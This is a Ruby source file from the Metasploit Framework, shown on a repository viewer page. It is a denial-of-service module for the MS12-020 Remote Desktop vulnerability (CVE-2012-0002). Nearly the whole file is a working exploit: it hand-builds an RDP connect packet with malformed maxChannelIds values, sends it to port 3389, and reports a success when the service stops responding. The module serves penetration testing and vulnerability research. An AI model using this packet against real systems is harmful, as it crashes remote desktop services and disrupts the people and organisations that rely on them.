Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Auxiliary::Report

8
  include Msf::Exploit::Remote::Tcp

9
  include Msf::Auxiliary::Dos

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'MS12-020 Microsoft Remote Desktop Use-After-Free DoS',

16
        'Description' => %q{

17
          This module exploits the MS12-020 RDP vulnerability originally discovered and

18
          reported by Luigi Auriemma.  The flaw can be found in the way the T.125

19
          ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result

20
          an invalid pointer being used, therefore causing a denial-of-service condition.

21
        },

22
        'References' => [

23
          [ 'CVE', '2012-0002' ],

24
          [ 'MSB', 'MS12-020' ],

25
          [ 'URL', 'http://www.privatepaste.com/ffe875e04a' ],

26
          [ 'URL', 'http://web.archive.org/web/20161020044803/http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],

27
          [ 'URL', 'http://web.archive.org/web/20160627131634/http://pastie.org/private/feg8du0e9kfagng4rrg' ],

28
          [ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],

29
          [ 'EDB', '18606' ],

30
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/03/21/metasploit-update/' ]

31
        ],

32
        'Author' => [

33
          'Luigi Auriemma',

34
          'Daniel Godas-Lopez', # Entirely based on Daniel's pastie

35
          'Alex Ionescu',

36
          'jduck',

37
          '#ms12-020' # Freenode IRC

38
        ],

39
        'License' => MSF_LICENSE,

40
        'DisclosureDate' => '2012-03-16',

41
        'Notes' => {

42
          'Stability' => [CRASH_SERVICE_DOWN],

43
          'SideEffects' => [],

44
          'Reliability' => []

45
        }

46
      )

47
    )

48


49
    register_options(

50
      [

51
        Opt::RPORT(3389)

52
      ]

53
    )

54
  end

55


56
  def is_rdp_up

57
    connect

58
    disconnect

59
    return true

60
  rescue Rex::ConnectionRefused

61
    return false

62
  rescue Rex::ConnectionTimeout

63
    return false

64
  end

65


66
  def run

67
    max_channel_ids = "\x02\x01\xff"

68


69
    pkt = '' \

70
          "\x03\x00\x00\x13" +  # TPKT: version + length

71
          "\x0E\xE0\x00\x00" +  # X.224 (connection request)

72
          "\x00\x00\x00\x01" \

73
          "\x00\x08\x00\x00" \

74
          "\x00\x00\x00" \

75
          "\x03\x00\x00\x6A" +  # TPKT: version + length

76
          "\x02\xF0\x80" + # X.224 (connect-initial)

77
          "\x7F\x65\x82\x00" + # T.125

78
          "\x5E" \

79
          "\x04\x01\x01" +  # callingDomainSelector

80
          "\x04\x01\x01" +  # calledDomainSelector

81
          "\x01\x01\xFF" +  # upwardFlag

82
          "\x30\x19" + # targetParameters

83
          max_channel_ids + # maxChannelIds

84
          "\x02\x01\xFF" +  # maxUserIds

85
          "\x02\x01\x00" +  # maxTokenIds

86
          "\x02\x01\x01" +  # numPriorities

87
          "\x02\x01\x00" +  # minThroughput

88
          "\x02\x01\x01" +  # maxHeight

89
          "\x02\x02\x00\x7C" + # maxMCSPDUsize

90
          "\x02\x01\x02" + # protocolVersion

91
          "\x30\x19" + # minimumParameters

92
          max_channel_ids + # maxChannelIds

93
          "\x02\x01\xFF" +  # maxUserIds

94
          "\x02\x01\x00" +  # maxTokenIds

95
          "\x02\x01\x01" +  # numPriorities

96
          "\x02\x01\x00" +  # minThroughput

97
          "\x02\x01\x01" +  # maxHeight

98
          "\x02\x02\x00\x7C" + # maxMCSPDUsize

99
          "\x02\x01\x02" + # protocolVersion

100
          "\x30\x19" + # maximumParameters

101
          max_channel_ids + # maxChannelIds

102
          "\x02\x01\xFF" +  # maxUserIds

103
          "\x02\x01\x00" +  # maxTokenIds

104
          "\x02\x01\x01" +  # numPriorities

105
          "\x02\x01\x00" +  # minThroughput

106
          "\x02\x01\x01" +  # maxHeight

107
          "\x02\x02\x00\x7C" + # maxMCSPDUsize

108
          "\x02\x01\x02" + # protocolVersion

109
          "\x04\x82\x00\x00" +  # userData

110
          "\x03\x00\x00\x08" +  # TPKT: version + length

111
          "\x02\xF0\x80" + # X.224

112
          "\x28" + # T.125

113
          "\x03\x00\x00\x08" + # TPKT: version + length

114
          "\x02\xF0\x80" + # X.224

115
          "\x28" + # T.125

116
          "\x03\x00\x00\x08" + # TPKT: version + length

117
          "\x02\xF0\x80" + # X.224

118
          "\x28" + # T.125

119
          "\x03\x00\x00\x08" + # TPKT: version + length

120
          "\x02\xF0\x80" + # X.224

121
          "\x28" + # T.125

122
          "\x03\x00\x00\x08" + # TPKT: version + length

123
          "\x02\xF0\x80" + # X.224

124
          "\x28" + # T.125

125
          "\x03\x00\x00\x08" + # TPKT: version + length

126
          "\x02\xF0\x80" + # X.224

127
          "\x28" + # T.125

128
          "\x03\x00\x00\x08" + # TPKT: version + length

129
          "\x02\xF0\x80" + # X.224

130
          "\x28" + # T.125

131
          "\x03\x00\x00\x08" + # TPKT: version + length

132
          "\x02\xF0\x80" + # X.224

133
          "\x28" + # T.125

134
          "\x03\x00\x00\x0C" + # TPKT: version + length

135
          "\x02\xF0\x80" + # X.224

136
          "\x38\x00\x06\x03" +  # T.125

137
          "\xF0" \

138
          "\x03\x00\x00\x09" +  # TPKT: version + length

139
          "\x02\xF0\x80" + # X.224

140
          "\x21\x80" # T.125

141


142
    unless is_rdp_up

143
      print_error("#{rhost}:#{rport} - RDP Service Unreachable")

144
      return

145
    end

146


147
    connect

148
    print_status("#{rhost}:#{rport} - Sending #{name}")

149
    sock.put(pkt)

150
    Rex.sleep(3)

151
    disconnect

152
    print_status("#{rhost}:#{rport} - #{pkt.length} bytes sent")

153


154
    print_status("#{rhost}:#{rport} - Checking RDP status...")

155


156
    if is_rdp_up

157
      print_error("#{rhost}:#{rport} - RDP Service Unreachable")

158
      return

159
    else

160
      print_good("#{rhost}:#{rport} seems down")

161
      report_vuln({

162
        host: rhost,

163
        port: rport,

164
        name: name,

165
        refs: references,

166
        info: "Module #{fullname} successfully crashed the target system via RDP"

167
      })

168
    end

169
  end

170
end

171


172